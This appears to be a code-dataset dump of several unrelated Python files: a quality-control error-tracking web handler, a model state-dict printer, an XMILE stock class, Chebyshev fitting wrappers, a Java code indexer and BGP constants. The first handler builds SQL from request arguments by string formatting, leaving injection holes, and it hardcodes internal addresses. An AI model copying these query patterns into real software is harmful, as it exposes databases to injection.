86400\n else:\n et = \"\"\n gp_sql = \"1=1\" if int(group_id) == 0 else \"t_edit_err_info.gp = %s \" % group_id\n st_sql = '1=1' if str(status) == \"99\" else 'status %s' % (where_in(status.split(\",\")))\n jst_sql = '1=1' if int(jd_status) == 99 else 'admin_judge = %s' % (jd_status)\n auther_sql = '1=1' if auther == \"default_auther\" else \"auther = '%s'\" % (auther)\n if channel == \"\":\n channel_sql = '1=1'\n else:\n try :\n resp_channel_list = js_load_req(\"http://172.16.198.126/manage/index/getNewChannelList?&name={}\".format(quote(channel)))[\"data\"]\n channel_list_temp = [item[\"channel\"] for item in resp_channel_list]\n channel_sql = 'channel %s' % where_in(channel_list_temp)\n #172.16.198.126 47.96.182.117\n url_temp = \"http://172.16.198.126/manage/index/getNewChannelList?&name={}\".format(quote(channel))\n print(url_temp)\n print(url_req(url_temp))\n resp_channel_list = js_load_req(url_temp)[\"data\"]\n channel_list_temp = [item[\"channel\"] for item in resp_channel_list]\n channel_sql = 'channel %s' % where_in(channel_list_temp)\n except Exception as err:\n channel_sql = '1=1'\n\n# channel_sql = '1=1' if channel == \"\" else 'channel = \"%s\"' % (channel)\n error_level_sql = '1=1' if error_level == \"\" else 'error_level = %s' % (error_level)\n kw_sql = \"1=1\" if key_word == \"\" else '`desc` like \"%{}%\"'.format(key_word)\n if st == \"\" and et == \"\":\n where_sql = \"where %s and `desc` != '质检完成' and status != 99\" % (' and '.join([gp_sql, st_sql, jst_sql, auther_sql, channel_sql, error_level_sql, kw_sql]))\n else:\n where_sql = \"where %s and create_time between '%s' and '%s' and `desc` != '质检完成' and status != 99\" % (' and '.join([gp_sql, st_sql, jst_sql, auther_sql, channel_sql, error_level_sql, kw_sql]), ts_to_time_str(st), ts_to_time_str(et))\n res = db.query(\"select id , channel , end , status , err_count count , start , start check_date , auther submit_user ,gp , create_time ,sys_err , `desc` , error_level level ,admin_judge, entry_clerk from t_edit_err_info %s order by start\" % (where_sql), \"db_qc\")\n ch_name_map = get_channel_name_map([i[\"channel\"] for i in res])\n res_ch_man = js_load_req(\"http://dmp.hz-data.com/Admin/CutTask/tqc_media_permission\")[\"mediaList\"]\n item = {}\n for row in res_ch_man:\n item[str(row[\"fmediaid\"])] = row[\"wx_alias\"] if row[\"wx_alias\"] is not None else \"\"\n for i in res:\n i[\"channel_canme\"] = ch_name_map.get(i[\"channel\"], \"??\")\n i[\"count\"] = int(i[\"count\"])\n # i[\"create_time\"] = i[\"create_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n i[\"create_time\"] = str(i[\"create_time\"])\n i[\"check_date\"] = ts_to_time_str(int(i[\"check_date\"]), \"%Y-%m-%d\")\n i[\"sys_err\"] = \"yes\" if i[\"sys_err\"] == 1 else \"no\"\n if i[\"submit_user\"] == \"录入退回\" and i[\"entry_clerk\"] is not None and i[\"entry_clerk\"].strip() != \"\":\n i[\"submit_user\"] = i[\"submit_user\"] + \"_\" + i[\"entry_clerk\"]\n if str(i[\"gp\"]) == \"90\":\n i[\"principal\"] = item.get(str(i[\"channel\"]), \"\")\n return {\"total\": len(res), 'rows': res}\n\n\ndef edit_error_submit(self, channel_id, start, end):\n try:\n err_count = int(self.get_argument(\"count\"))\n except:\n err_count = 1\n\n start ,end = int( start ) , int( end )\n desc = self.get_argument( \"reason\" ) \n auther = self.get_argument( \"submit_user\" ) \n error_level = self.get_argument( \"level\" , '0' ) \n sys_err = 1 if self.get_argument( \"sys_err\" ,\"no\" ) == \"yes\" else 0\n entry_clerk = self.get_argument(\"entry_clerk\", \"\")\n \n # 上海传入基本都为一整天 
从0:0:0-23:59:59 强制转为7200s\n # if auther in special_auther_list and end-start >= 83000:\n # end = start + 72000\n \n gp = db.query(\"select edit_lock.group gp from edit_lock where channel = '%s' \" % (channel_id), \"db\")[0][\"gp\"]\n\n # 插入数据前根据 channel, start, end, desc 做去重判断\n sql_select = \"select id from t_edit_err_info where `channel` = '%s' and `start` = '%s' and `end` = '%s' and `desc` = '%s' and status != 99\" % (\n channel_id, start, end, desc)\n res = db.query(sql_select, \"db_qc\")\n if res:\n sql_update = \"update t_edit_err_info set err_count = '%s', auther = '%s', gp = '%s', sys_err = '%s', error_level = '%s', entry_clerk = '%s', create_time = '%s' where id = '%s'\" % (\n err_count, auther, gp, sys_err, error_level, entry_clerk, ts_to_time_str(time.time()), res[-1]['id'])\n ret = db.query(sql_update, \"db_qc\")\n else:\n ret = db.query(\n \"insert into t_edit_err_info (channel, start, `end`, err_count, `desc`, auther, gp, sys_err, error_level, entry_clerk) values('%s', %s, %s, %s, '%s', '%s', %s , %s , %s, '%s')\" % (\n channel_id, start, end, err_count, desc, auther, gp, sys_err, error_level, entry_clerk), \"db_qc\")\n if desc != \"质检完成\" and auther not in(\"录入退回\", \"客户退回\"):\n db.query(\"update status_monitor set edit_flag = 7, edit_time = now(), judge_flag = -1, judge_time = now(), sync_flag = 0, sync_time = now(), dmp_flag = 0, dmp_time = now() where channel = '%s' and day = '%s'\" % (channel_id, ts_to_time_str(int(start))[:10]), \"db\")\n ret_write(self, ret=0, data=ret)\n\n\ndef edit_error_update(self, err_id, status):\n db.query(\"update t_edit_err_info set status = %s where id = %s \" % (status, err_id), \"db_qc\")\n auther = db.query(\"select auther from t_edit_err_info where id = %s \" % (err_id), \"db_qc\")[0][\"auther\"]\n if -1 == int(status) and auther == 'shanghai':\n info = db.query(\"select channel, start , end from t_edit_err_info where id = %s \" % (err_id), \"db_qc\")[0]\n ret = url_req(\"http://dmp.hz-data.com/Api/ShIssue/push_finish_backtask\", post_str=\"mediaid=%s&issuedate=%s\" % (\n info[\"channel\"], ts_to_time_str((info[\"end\"] + info[\"start\"]) / 2, \"%Y-%m-%d\")))\n ret_write(self, ret=0)\n\n\ndef edit_error_kv_update(self, err_id, key, value):\n db.query(\"update t_edit_err_info set %s = %s where id = %s \" % (key, value, err_id), \"db_qc\")\n ret_write(self, ret=0)\n\n\ndef edit_error_info(self, channel_id, start, end):\n start, end = float(start), float(end)\n ret = db.query(\n \"select id , start ,end , err_count count , auther user , `desc` , create_time , status , error_level level from t_edit_err_info where channel = '%s' and start between %s and %s and auther not in (%s) and err_count > 0 and status != 2 and status != 99\" % (\n channel_id, start - 2222, end, auther_not_in), \"db_qc\")\n ret = list(filter(lambda x: seg_join_length(x[\"start\"], x[\"end\"], start, end) >= 1, ret))\n for i in ret:\n i[\"start\"] = ts_to_time_str(i[\"start\"])\n i[\"end\"] = ts_to_time_str(i[\"end\"])\n i[\"create_time\"] = i[\"create_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n ret_write(self, ret=0, data=ret)\n\n\ndef edit_error_rank(self, start_date, end_date):\n res = edit_error_summary(start_date, end_date)\n res = sorted(res, reverse=True, key=lambda x: x[\"err_perc\"])\n if res[9][\"err_perc\"] <= 0.05:\n res = res[:10]\n else:\n res = list(filter(res, lambda x: x[\"err_perc\"] > 0.05))\n ret_write(self, data=res)\n\n\ndef edit_error_work(self, checker_name, check_date):\n year, month = int(check_date[:4]), int(check_date[4:])\n if month == 12:\n 
year2, month2 = year + 1, 1\n else:\n year2, month2 = year, month + 1\n sql = \"select * from t_edit_err_info where auther = '%s' and create_time between '%.4d-%.2d-01 00:00:00' and '%.4d-%.2d-01 00:00:00' and status != 99\" % (\n checker_name, year, month, year2, month2)\n res = db.query(\n \"select channel , create_time , err_count from t_edit_err_info where auther = '%s' and create_time between '%.4d-%.2d-01 00:00:00' and '%.4d-%.2d-01 00:00:00' and status != 99\" % (\n checker_name, year, month, year2, month2), \"db_qc\")\n info = {}\n for i in res:\n key = i[\"create_time\"].strftime(\"%Y-%m-%d\")\n if key in info:\n info[key][\"channel\"] = info[key][\"channel\"] + 1\n info[key][\"err_count\"] = info[key][\"err_count\"] + i[\"err_count\"]\n else:\n info[key] = {\"channel\": 1, \"err_count\": i[\"err_count\"], \"date\": key}\n ret_write(self, data=list(info.values()))\n\n\ndef edit_error_summary(s_date, e_date, gp=\"\"):\n if \"\" == gp:\n ch_sql = \"1=1\"\n err_query = \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther not in (%s) and %s order by channel , start \" % (\n s_date, e_date, auther_not_in, ch_sql)\n else:\n ch_sql = \"gp = %s \" % gp\n err_query = \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther not in (%s) and %s and sys_err = 0 order by channel , start \" % (\n s_date, e_date, auther_not_in, ch_sql)\n\n s_date = s_date + \" 00:00:00\"\n e_date = e_date + \" 23:59:59\"\n\n res = db.query(err_query, \"db_qc\")\n # res = db.query( \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther !='shanghai' and %s and sys_err = 0 order by channel , start \" % ( s_date, e_date , ch_sql ), \"db_qc\" )\n\n ret = []\n ch_info_map = {i[\"channel\"]: i for i in\n db.query(\"select channel , edit_lock.group gp ,channel_cname from edit_lock \", \"db\")}\n res = _group_by(res, key_func=lambda x: \"%s_%s\" % (x[\"channel\"], ts_to_time_str(x[\"start\"], \"%Y-%m-%d\")))\n for key, info in res.items():\n ch, data_date = key.split(\"_\")\n if ch not in ch_info_map: continue\n last_create_time = max([x[\"create_time\"] for x in info])\n err_sum = sum([x[\"err_count\"] for x in info])\n day_st = time_str_to_ts(data_date + \" 00:00:00\")\n day_et = day_st + 86400\n summary_num = db.query(\n \"select count( *) num from summary where channel = '%s' and start between %s and %s and tag in ( 0,1,3,4 ) and create_time <'%s' \" % (\n ch, day_st, day_et, last_create_time), \"db\")[0][\"num\"]\n if 0 != err_sum:\n err_perc = err_sum / (err_sum + summary_num)\n else:\n err_perc = 0.0\n ret.append({\"check_date\": info[0][\"create_time\"].strftime(\"%Y-%m-%d\"),\n \"data_date\": data_date,\n \"err_count\": err_sum,\n \"summary_count\": summary_num,\n \"channel\": ch,\n \"gp\": info[0][\"gp\"],\n \"sys_err\": 0,\n \"channel_cname\": ch_info_map[ch][\"channel_cname\"],\n \"err_perc\": err_perc})\n\n ret = sorted(ret, key=lambda x: x[\"err_perc\"], reverse=True)\n if \"\" == gp: return ret\n\n res2 = db.query(\n \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther not in (%s) and %s and sys_err = 1 order by channel , start \" % (\n s_date, e_date, auther_not_in, ch_sql), \"db_qc\")\n\n filled_data = list(res.keys())\n\n for x in res2:\n key = \"%s_%s\" % (x[\"channel\"], ts_to_time_str(x[\"start\"], \"%Y-%m-%d\"))\n if key in filled_data: continue\n 
filled_data.append(key)\n ret.append({\"check_date\": x[\"create_time\"].strftime(\"%Y-%m-%d\"),\n \"data_date\": ts_to_time_str(x[\"start\"], \"%Y-%m-%d\"),\n \"err_count\": x[\"err_count\"],\n \"summary_count\": 0,\n \"channel\": x[\"channel\"],\n \"sys_err\": 1,\n \"gp\": x[\"gp\"],\n \"channel_cname\": ch_info_map[x['channel']][\"channel_cname\"],\n \"err_perc\": 0})\n return ret\n\n\nfrom local_utils import _err_ansi_range\n\n\ndef _edit_task_exists(channel_id, start, end):\n return sum([x[1] - x[0] for x in _err_ansi_range(channel_id, start, end)]) > 3\n\n\n# print( edit_error_summary( \"2019-08-23\" , \"2019-08-27\" ,\"\" ) )\n\n\ndef err_check_status(self):\n res = db.query(\n \"select channel ,start ,gp ,status from t_edit_err_info where auther = 'psp' and create_time > '%s' order by status , channel \" % (\n ts_to_time_str(time.time() - 86400)), \"db_qc\")\n ch_name_map = get_channel_name_map([i[\"channel\"] for i in res])\n for x in res:\n x['ch_name'] = ch_name_map[x['channel']]\n x['day'] = ts_to_time_str(x['start'], '%Y-%m-%d')\n x['status'] = '完成' if x['status'] == -1 else '未完成'\n del x['start']\n self.write(json.dumps(res))\n\n\nfrom local_utils import _group_by\n\n\ndef edit_error_checker(self, start_date, end_date):\n info = db.query(\n 'select channel , admin_judge ,auther , status from t_edit_err_info where create_time between \"%s 00:00:00\" and \"%s 00:00:00\" and `desc` != \"质检完成\" and status != 99' % (\n start_date, end_date), 'db_qc')\n info2 = db.query(\n 'select channel , admin_judge ,auther , status from t_edit_err_info where create_time between \"%s 00:00:00\" and \"%s 00:00:00\" and status != 99' % (\n start_date, end_date), 'db_qc')\n auther_list = set([x['auther'] for x in info])\n au_gp_auther = _group_by(info, lambda x: x['auther'])\n au_gp_auther2 = _group_by(info2, lambda x: x['auther'])\n res = {x: {'auther': x, 'total': len(au_gp_auther[x])} for x in au_gp_auther}\n for auther in res:\n ch_info2 = list(filter(lambda x: auther == x['auther'], info2))\n res[auther]['ch_count'] = len(set([x['channel'] for x in ch_info2])) # the confirmed data also shall be marked\n ch_info = list(filter(lambda x: auther == x['auther'], info))\n res[auther]['not_error'] = len(list(filter(lambda data: 1 == data['status'], ch_info)))\n res[auther]['admin_judge_err'] = len(list(filter(lambda data: 1 == data['admin_judge'], ch_info)))\n res[auther]['effective'] = len(\n list(filter(lambda x: x['status'] in (-1, 0, 3) and 0 == x['admin_judge'], ch_info)))\n res[auther]['perc'] = '{}%'.format(int(float(res[auther]['effective']) * 100 / res[auther]['total']))\n\n ret = {'count': len(res), 'rows': sorted(res.values(), key=lambda x: x['auther'])}\n self.write(json.dumps(ret))\n\n\ndef group_sync_error(self):\n channel = self.get_argument(\"channel\", \"\")\n date_start = self.get_argument(\"date_start\", \"\")\n date_end = self.get_argument(\"date_end\", \"\")\n channel_sql = \"1=1\" if channel == \"\" else \"channel = '%s'\" % channel\n date_start_sql = \"1=1\" if date_start == \"\" else \"day >= '%s'\" % date_start\n date_end_sql = \"1=1\" if date_end == \"\" else \"day <= '%s'\" % date_end\n sql = \"select channel, monitor_err_info, update_time from post_process_day_job where recheck_status = 2 and %s\" % \" and \".join([channel_sql, date_start_sql, date_end_sql])\n res = db.query(sql, 'db')\n # print(res)\n ch_name_map = get_channel_name_map(list(set([i[\"channel\"] for i in res])))\n res_sync = []\n for row in res:\n dict_item = json.loads(row[\"monitor_err_info\"])\n for key, 
value in dict_item.items():\n for item in value[\"data_list\"]:\n item[\"admin_judge\"] = 0\n item[\"channel_canme\"] = ch_name_map.get(item[\"channel\"], \"??\")\n item[\"count\"] = 1\n item[\"desc\"] = key\n item[\"sys_err\"] = \"yes\"\n item[\"submit_user\"] = \"sync_monitor\"\n item[\"status\"] = \"0\"\n item[\"create_time\"] = str(row[\"update_time\"])\n item[\"gp\"] = \"\"\n item[\"entry_clerk\"] = \"\"\n res_sync.append(item)\n self.write(json.dumps({\"total\": len(res_sync), 'rows': res_sync}))\n\n\nhandler_list = [\n (r'/group_edit_error/(?P.*)/', mk_req_handler(get=group_edit_error)),\n (r'/edit_error_summary/(?P.*)/(?P.*)/', mk_req_handler(get=lambda self, start, end: ret_write(self, data=edit_error_summary(start, end, self.get_argument(\"group\", \"\"))))),\n (r'/edit_error_submit/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(post=edit_error_submit)),\n (r'/edit_error_update/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_update)),\n (r'/edit_error_kv_update/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_kv_update)),\n (r'/edit_error_info/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_info)),\n (r'/edit_error_rank/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_rank)),\n (r'/edit_error_work/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_work)),\n (r'/edit_error_checker/(?P.*)/(?P.*)/', mk_req_handler3(get=edit_error_checker)),\n (r'/edit_task_exists/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(get=lambda self, channel_id, start, end: ret_write(self, 0 if _edit_task_exists(channel_id, int(start), int(end)) else 1))),\n (r'/err_check_status/', mk_req_handler(get=err_check_status)),\n (r'/group_sync_error/', mk_req_handler(get=group_sync_error))\n]\n","sub_path":"py_interface/123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":18705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"495291572","text":"# validate state dict, TO BE DELETED\nimport torch\nimport math\nfrom utils import Vocab, OOVDict, Batch, format_tokens, Dataset\nfrom model import DEVICE, Seq2SeqOutput, Seq2Seq\nfrom params import Params\n\ndef print_dict():\n p = Params()\n dataset = Dataset(\n p.data_path,\n max_src_len=p.max_src_len,\n max_tgt_len=p.max_tgt_len,\n truncate_src=p.truncate_src,\n truncate_tgt=p.truncate_tgt,\n )\n v = dataset.build_vocab(p.vocab_size, embed_file=p.embed_file)\n m = Seq2Seq(v, p)\n m.load_state_dict(torch.load(\"state_dict.pth\"))\n m.eval()\n print(\"state dict\")\n print(m.state_dict())\n\nprint_dict()","sub_path":"Well Log Mnemonics/aliaser/print_state_dict.py","file_name":"print_state_dict.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"470360720","text":"from src.formalismos.xmile.Inflow import Inflow\nfrom src.formalismos.xmile.Outflow import Outflow\nfrom src.utils.auxiliares.Equation import Equation\n\n\nclass Stock(object):\n def __init__(self, stock_element, source_xmlns, parent, sim_specs, dimensions, debug):\n self.debug = debug\n self.sim_specs = sim_specs\n self.dimensions = dimensions\n self.parent = parent\n self.source_xmlns = source_xmlns\n self.stock_element = stock_element\n self.name = self.get_name()\n self.access = self.get_access()\n self.equation = self.get_equation()\n self.outflows = self.get_outflows()\n self.inflows = self.get_inflows()\n self.nonNegative = self.get_non_negative()\n \n def __repr__(self):\n return str({\n 'parent' : self.parent,\n 'name' : self.name,\n 'access' : 
self.access,\n 'equation' : self.equation,\n 'outflows' : self.outflows,\n 'inflows' : self.inflows,\n 'nonNegative' : self.nonNegative\n })\n \n def __str__(self):\n return str({\n 'parent' : self.parent,\n 'name' : self.name,\n 'access' : self.access,\n 'equation' : self.equation,\n 'outflows' : self.outflows,\n 'inflows' : self.inflows,\n 'nonNegative' : self.nonNegative\n })\n \n def get_name(self):\n name = self.stock_element.get('name')\n if name is None:\n raise Exception('Error: todos los stocks deben tener nombre')\n return name\n \n def get_access(self):\n access = self.stock_element.get('access')\n if access is None:\n return None\n if self.debug:\n print('El stock ' + self.parent + '.' + self.name + ' es de acceso tipo ' + access)\n return access\n \n def get_equation(self):\n equation = self.stock_element.find(self.source_xmlns + 'eqn').text\n if equation == '':\n raise Exception('Error: hay una ecuacion definida sin ningun simbolo (invalida) en' + self.name)\n return Equation(equation, self.sim_specs, self.dimensions, self.name, self.debug)\n \n def get_outflows(self):\n outflows = self.stock_element.findall(self.source_xmlns + 'outflow')\n return list(map(lambda x : Outflow(x, self.source_xmlns, self.debug), outflows))\n \n def get_inflows(self):\n inflows = self.stock_element.findall(self.source_xmlns + 'inflow')\n return list(map(lambda x : Inflow(x, self.source_xmlns, self.debug), inflows))\n \n def get_non_negative(self):\n nonNegative = self.stock_element.find('non_negative')\n if nonNegative is None:\n return 0\n return 1\n\n def get_equation_variables(self):\n return self.equation.get_variables()","sub_path":"src/formalismos/xmile/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425970845","text":" # put your python code here\na = int(input())\nb = int(input())\nc = []\n\nfor n in range(a, b + 1):\n if n % 3 == 0:\n c.append(n)\n\nprint(sum(c) / len(c))\n","sub_path":"Problems/The average of all numbers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"447026156","text":"# -*- coding: utf-8 -*-\n# -*- mode: python -*-\n#\n# Copyright (c) 2008-2014, Christoph Gohlke\n# Copyright (c) 2008-2014, The Regents of the University of California\n# Produced at the Laboratory for Fluorescence Dynamics\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holders nor the names of any\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\"\"\"Fit exponential and harmonic functions using Chebyshev polynomials.\n\n:Author:\n `Christoph Gohlke `_\n\n:Organization:\n Laboratory for Fluorescence Dynamics, University of California, Irvine\n\n:Version: 2013.01.18\n\nRequirements\n------------\n* `CPython 2.7 or 3.3 `_\n* `Numpy 1.7 `_\n* `Chebyfit.c 2013.01.18 `_\n* `Matplotlib 1.2 `_ (optional for plotting)\n\nReferences\n----------\n(1) Analytic solutions to modelling exponential and harmonic functions using\n Chebyshev polynomials: fitting frequency-domain lifetime images with\n photobleaching. G C Malachowski, R M Clegg, and G I Redford.\n J Microsc. 2007; 228(3): 282-295. doi: 10.1111/j.1365-2818.2007.01846.x\n\nExamples\n--------\n>>> import chebyfit\n\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom dlab._chebyshev import forward_transform, inverse_transform, polynomials\nfrom dlab._chebyshev import normalization_factors, polynomial_roots\n\n\ndef fit_exponentials(data, n_exps, n_coef=6, dt=1.0, axis=-1):\n \"\"\"Fit data to a sum of one or more exponential functions\n\n Parameters\n ----------\n data : 1-D or 2-D array\n The data to be fit\n n_exps : int\n The number of exponentials to fit to the data\n n_coef : int\n The number of coefficients used to fit the data. Must be >=6 and < 64.\n dt : float\n The sampling rate of the data. Used to scale the returned time constant(s)\n axis : int\n If data.dim is > 1, specify the time dimension\n\n Returns\n -------\n dict\n {offset, amplitude, lifetime}\n array\n The fitted data\n\n \"\"\"\n from dlab._chebyshev import fitexps\n params, fitted = fitexps(data, n_exps, n_coef, deltat=dt, axis=axis)\n return (\n {\n \"offset\": params[..., 0],\n \"amplitude\": params[..., 1:(1 + n_exps)],\n \"lifetime\": params[..., (1 + n_exps):(1 + 2 * n_exps)]\n },\n fitted)\n\n\ndef fit_harmonic_decay(data, n_coef=6, dt=1.0, axis=-1):\n \"\"\"Fit data to a harmonic exponential decay function\n\n Parameters\n ----------\n data : 1-D or 2-D array\n The data to be fit\n n_coef : int\n The number of coefficients used to fit the data. Must be >= 6. More is better.\n dt : float\n The sampling rate of the data. 
Used to scale the returned time constant(s)\n axis : int\n If data.dim is > 1, specify the time dimension\n\n Returns\n -------\n dict\n {offset, amplitude, lifetime, frequency}\n array\n The fitted data\n \"\"\"\n from dlab._chebyshev import fitexpsin\n params, fitted = fitexpsin(data, n_coef, deltat=dt, axis=axis)\n return params, fitted\n return ({\"offset\": params[..., 0],\n \"amplitude\": params[..., 1:3],\n \"lifetime\": params[..., 3],\n \"frequency\": params[..., 4]},\n fitted)\n","sub_path":"dlab/chebyshev.py","file_name":"chebyshev.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"40404357","text":"import sys \nimport os\nfrom antlr4 import *\nfrom indexer.JavaLexer import JavaLexer\nfrom indexer.JavaParser import JavaParser\nfrom indexer.JavaSourceIndexer import JavaSourceIndexer\nfrom math import sqrt\nfrom indexer.DB import DB\nimport rpy2.robjects as R\n\ndef coSim(x, y):\n dot = 0 \n for v in range(len(x)):\n dot += x[v]*y[v]\n len1 = 0\n for v in x:\n len1 += (v**2)\n len1 = sqrt(len1)\n len2 = 0\n for v in y:\n len2 += (v**2)\n len2 = sqrt(len2) \n\n return dot/(len1*len2)\n\ntheTestFiles = dict()\ndef main(args):\n theDB = DB(\":memory:\")\n for no, pe, files in os.walk(args[1]):\n for f in files:\n print(\"indexing: \" + args[1] + \"/\" + f)\n inputData = FileStream(args[1] + \"/\" + f)\n lexer = JavaLexer(inputData)\n tokens = CommonTokenStream(lexer)\n parser = JavaParser(tokens) \n tree = parser.compilationUnit()\n\n theFileID = -1\n with open(args[1] + \"/\" + f, 'r') as tehFile:\n theFileID = theDB.putFile(tehFile.read())[0]\n\n tokenList = JavaSourceIndexer(theDB, theFileID).visit(tree)\n #print(tokenList)\n theTestFiles[f] = tokenList\n \n problems = theTestFiles.keys()\n problems.sort() \n \n finds = 0.0\n total = 0.0\n\n diffSims = []\n sameSims = []\n\n for i in range(len(problems)):\n sameSim = 0\n sameCount = 0\n diffSim = 0\n diffCount = 0\n for j in range(len(problems)):\n if problems[j][:problems[j].find(\".\")] == problems[i][:problems[i].find(\".\")] and problems[j] != problems[i]:\n sameSim += coSim(theTestFiles[problems[i]], theTestFiles[problems[j]])\n sameCount += 1\n else:\n diffSim += coSim(theTestFiles[problems[i]], theTestFiles[problems[j]])\n diffCount += 1\n sameSim /= sameCount\n diffSim /= diffCount\n if sameSim > diffSim:\n finds += 1.0\n else:\n print(problems[i] + \" was more similar to arbitrary code than to mutations of \" + problems[i])\n total += 1.0\n\n diffSims.append(diffSim)\n sameSims.append(sameSim)\n \n \n print(str(finds/total) + \" percent of files were more similar to mutations of themselves than to arbitary code.\")\n \n\n\n # t-test\n\n res = R.r['t.test'](R.FloatVector(sameSims), R.FloatVector(diffSims))\n \n print(\"The p-value of a student's t test, testing the difference in similarity between mutations of code, and arbitrary code is:\")\n print(res.rx('p.value')[0][0])\n\n print(\"The 95% confidence interval of the difference is:\")\n print(res.rx('conf.int')[0])\n \nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"VersionAlpha0.0.1/performanceEstimator/JavaIndexer.py","file_name":"JavaIndexer.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"346975237","text":"# bgp.constants.py\n# Copyright (c) 2007-2018 by Mark Bergsma \n\n# This program is free software: you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\"\"\"\nBGP constants as used by several BGP modules\n\"\"\"\n\n# Constants\nVERSION = 4\nPORT = 179\n\nHDR_LEN = 19\nMAX_LEN = 4096\n\n# BGP messages\nMSG_OPEN = 1\nMSG_UPDATE = 2\nMSG_NOTIFICATION = 3\nMSG_KEEPALIVE = 4\n\n# BGP FSM states\nST_IDLE, ST_CONNECT, ST_ACTIVE, ST_OPENSENT, ST_OPENCONFIRM, ST_ESTABLISHED = range(6)\n\nstateDescr = {\n ST_IDLE: \"IDLE\",\n ST_CONNECT: \"CONNECT\",\n ST_ACTIVE: \"ACTIVE\",\n ST_OPENSENT: \"OPENSENT\",\n ST_OPENCONFIRM: \"OPENCONFIRM\",\n ST_ESTABLISHED: \"ESTABLISHED\"\n}\n\n# Notification error codes\nERR_MSG_HDR = 1\nERR_MSG_OPEN = 2\nERR_MSG_UPDATE = 3\nERR_HOLD_TIMER_EXPIRED = 4\nERR_FSM = 5\nERR_CEASE = 6\n\n# Notification suberror codes\nERR_MSG_HDR_CONN_NOT_SYNC = 1\nERR_MSG_HDR_BAD_MSG_LEN = 2\nERR_MSG_HDR_BAD_MSG_TYPE = 3\n\nERR_MSG_OPEN_UNSUP_VERSION = 1\nERR_MSG_OPEN_BAD_PEER_AS = 2\nERR_MSG_OPEN_BAD_BGP_ID = 3\nERR_MSG_OPEN_UNSUP_OPT_PARAM = 4\nERR_MSG_OPEN_UNACCPT_HOLD_TIME = 6\n\nERR_MSG_UPDATE_MALFORMED_ATTR_LIST = 1\nERR_MSG_UPDATE_UNRECOGNIZED_WELLKNOWN_ATTR = 2\nERR_MSG_UPDATE_MISSING_WELLKNOWN_ATTR = 3\nERR_MSG_UPDATE_ATTR_FLAGS = 4\nERR_MSG_UPDATE_ATTR_LEN = 5\nERR_MSG_UPDATE_INVALID_ORIGIN = 6\nERR_MSG_UPDATE_INVALID_NEXTHOP = 8\nERR_MSG_UPDATE_OPTIONAL_ATTR = 9\nERR_MSG_UPDATE_INVALID_NETWORK_FIELD = 10\nERR_MSG_UPDATE_MALFORMED_ASPATH = 11\n\n# BGP Open optional parameter codes\nOPEN_PARAM_CAPABILITIES = 2\n\n# BGP Capability codes\nCAP_MP_EXT = 1\nCAP_ROUTE_REFRESH = 2\nCAP_ORF = 3\n\nAFI_INET = 1\nAFI_INET6 = 2\nSUPPORTED_AFI = 